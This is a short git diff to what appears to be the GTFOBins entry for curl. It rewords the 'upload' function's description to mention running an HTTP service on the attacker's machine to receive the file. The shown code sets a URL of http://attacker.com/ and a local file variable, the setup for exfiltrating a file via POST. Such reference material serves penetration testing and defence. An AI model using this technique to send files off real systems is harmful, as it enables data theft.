diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 8a1ce0d..68f77e5 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -1,7 +1,7 @@ --- functions: upload: - - description: Send local file with an HTTP POST request. + - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | URL=http://attacker.com/ LFILE=file_to_send